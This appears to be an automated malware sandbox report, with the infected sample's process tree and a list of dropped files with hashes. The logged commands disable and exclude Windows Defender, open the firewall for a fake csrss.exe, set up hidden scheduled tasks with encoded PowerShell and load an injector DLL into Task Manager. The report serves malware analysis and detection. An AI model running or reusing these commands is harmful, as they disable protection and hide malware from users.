"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gMvUkTVLF" /SC once /ST 01:37:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gMvUkTVLF"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gMvUkTVLF"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 10:59:43 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\gMqqyxU.exe\" XT /Pisite_idaaw 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\gMqqyxU.exe
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\gMqqyxU.exe XT /Pisite_idaaw 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\wsSuZb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\nANKiDo.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qbSDwEgyNYPZlGA"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\fTFbbQv.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\QPIRdrq.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\lrMXAbH.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\hHLlPFm.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 10:37:19 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\xSrBBRNN\fNyRhtE.dll\",#1 /LKsite_idgQI 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QhciBzJOokLnyYZub"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\xSrBBRNN\fNyRhtE.dll",#1 /LKsite_idgQI 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\xSrBBRNN\fNyRhtE.dll",#1 /LKsite_idgQI 385118
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
Files
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
| MD5 | ea2314bc92bc85449967f3702b16b3f1 |
| SHA1 | 1b7b0006e65b9034617993710ea434f5a5f8a9d3 |
| SHA256 | 77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1 |
| SHA512 | f7964e45d1c6c1f280d277126a65c10dad131f761125f59bcfd305d4af73fc673bc5670685f4f5c7d8b4f9cf74be55eaef13eb95458bf93bc307a8bb6a1ad8db |
C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe
| MD5 | d29e40c77247d5eea4c4029b804aa549 |
| SHA1 | 9031e95e7c03ebe7b7c1e828bf18325a76972168 |
| SHA256 | 0baee82ecdf7b62ca540857e4e3a46dfeda2e4c31352a4a064af7c40c154b9c2 |
| SHA512 | 3a50c63887f677aae90fb976b5c8677f913447cb6700eeb83bcc261e60d2d394f8876350b10e6c6b4e1906a7f05777eb6379346dbf0d618f1e3e35febbf5a4cf |
C:\Users\Admin\1000013002\7617c78a76.exe
| MD5 | 3c0e9766b3871534c9ce1cb3c1bd6411 |
| SHA1 | 51c16a07072426188274a51ed54f9221451d3d07 |
| SHA256 | 7c813337ec7128442715e50e9206b28eeeeef151d1d9e2feb811813c44ff0cf3 |
| SHA512 | 43f315a302619547012defee1a136d9fe209fa4049fd6dc9ac88cfd4c8d721aa095062869c175219c4244dbf7d67854b15e5e0aab0c61aa2a2126f62c1f0bf98 |
\??\pipe\crashpad_2692_GWUGPIQYIIBDWOQA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe
| MD5 | c276e339570b6fd5baee1f245d5709fe |
| SHA1 | 26441e287b3afea93aa261fe67e462198f6dd6a5 |
| SHA256 | bb8ffe36beffbd984cff743f7091577798e5a58c7f6292bebc913bea7188a288 |
| SHA512 | aa22735eb01db36c14935640814c275dbde94602d13095fded0c36c19bb8ba2160b8fa63471cd131169554ea657cd6db8b7bf1b5fba19aeee8ab3412277ebf72 |
memory/1444-167-0x0000000000590000-0x0000000000B7B000-memory.dmp
memory/1444-177-0x00000000052A0000-0x00000000052A1000-memory.dmp
memory/1444-178-0x0000000005270000-0x0000000005271000-memory.dmp
memory/1444-179-0x0000000005260000-0x0000000005261000-memory.dmp
memory/1444-184-0x0000000005250000-0x0000000005251000-memory.dmp
memory/1444-185-0x00000000052B0000-0x00000000052B1000-memory.dmp
memory/1444-194-0x0000000005290000-0x0000000005291000-memory.dmp
memory/1444-198-0x0000000005240000-0x0000000005241000-memory.dmp
memory/1444-197-0x00000000052F0000-0x00000000052F1000-memory.dmp
memory/1444-189-0x0000000005300000-0x0000000005301000-memory.dmp
memory/1444-199-0x0000000005330000-0x0000000005332000-memory.dmp
memory/1444-187-0x00000000052E0000-0x00000000052E1000-memory.dmp
memory/1444-183-0x00000000052D0000-0x00000000052D1000-memory.dmp
memory/4912-202-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/2224-210-0x0000000000D70000-0x000000000122E000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 5a1ea8d1b0282e55e79bff0a5c4464ce |
| SHA1 | 87d0b96fc4f76a34d9845f6dfc12307a97abc91a |
| SHA256 | 28aa626797a2748462a6ce8e6709aa1d6cff60366bb4062cec29e7d87ae3e3cc |
| SHA512 | 7332b5da41d72e61382d8cb7f3b27e05f550af61feb4a8af7f1d874b43dabbb4c6613e1a04e6f1803efff2c8484e4e09c3954efe179fa339bb0ae5cf1d68d72e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e6f9415bcdfad56ec41b7af6aac6542c |
| SHA1 | 7afe0c0cd0b074de9e22a0367a79aba55a870e77 |
| SHA256 | 2b0a3325412025751f03809e9dcfeb8625e271f9f728bf95906e1b12c1bc162d |
| SHA512 | 432f487c8ba76ff59ecbd4fa5d35a986ee12f6d0c8dbdf93b04f38e34cc1abb2cee017757b201142d600749f5adbff7e72f71ba3ba2ce46bcbb2eadea3d03b97 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4509d426e55f1473d12c364a73529989 |
| SHA1 | be7c0c19f8902f0ff5d47a780e6c4150fb369c62 |
| SHA256 | 407c81dfe990ebf0d65d4d10b8ee3348c3aa46a4475907eb38aa2a1edd2a6a72 |
| SHA512 | 02ac02bb3491074559530ebd6e65f0183764dd0617121fb1a9f754d5ca235e7e87652ac380f8dde212fd50981cc246a5461ea41ab64706bc591a714babc7d334 |
memory/1444-226-0x0000000000590000-0x0000000000B7B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 0c44c03c790b4eb24610e1878cec99a0 |
| SHA1 | be8a34ef96fb3810e995799f20dc1b201d826099 |
